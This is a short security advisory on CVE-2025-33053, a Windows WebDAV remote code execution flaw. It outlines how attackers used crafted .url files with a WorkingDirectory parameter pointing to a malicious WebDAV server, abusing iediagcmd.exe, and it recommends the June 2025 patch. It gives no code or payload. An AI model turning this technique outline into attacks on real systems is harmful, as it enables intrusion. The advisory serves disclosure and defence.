CVE-2025-33053

Name of the Vulnerable Software and Affected Versions Microsoft Windows versions prior to the June 2025 Patch Tuesday update

Description A remote code execution vulnerability exists in the Web Distributed Authoring and Versioning (WebDAV) component of Microsoft Windows. This flaw allows an attacker to execute arbitrary code on a system by exploiting improper handling of file paths and names, specifically through specially crafted .url files. The vulnerability has been actively exploited by the Stealth Falcon APT group in targeted attacks, particularly against defense and government organizations in the Middle East and Africa. The attackers utilized this vulnerability to deploy malware, including the Horus Agent, by manipulating the working directory of legitimate Windows tools. The vulnerability is triggered when a user clicks on a malicious link. It is estimated that this vulnerability has been exploited since March 2025. The API endpoint used in the attacks involves the exploitation of the

iediagcmd.exe

executable. The vulnerability leverages the manipulation of the

WorkingDirectory

parameter within the .url file to point to a malicious WebDAV server.

Recommendations Apply the June 2025 Patch Tuesday updates to all affected systems to address CVE-2025-33053.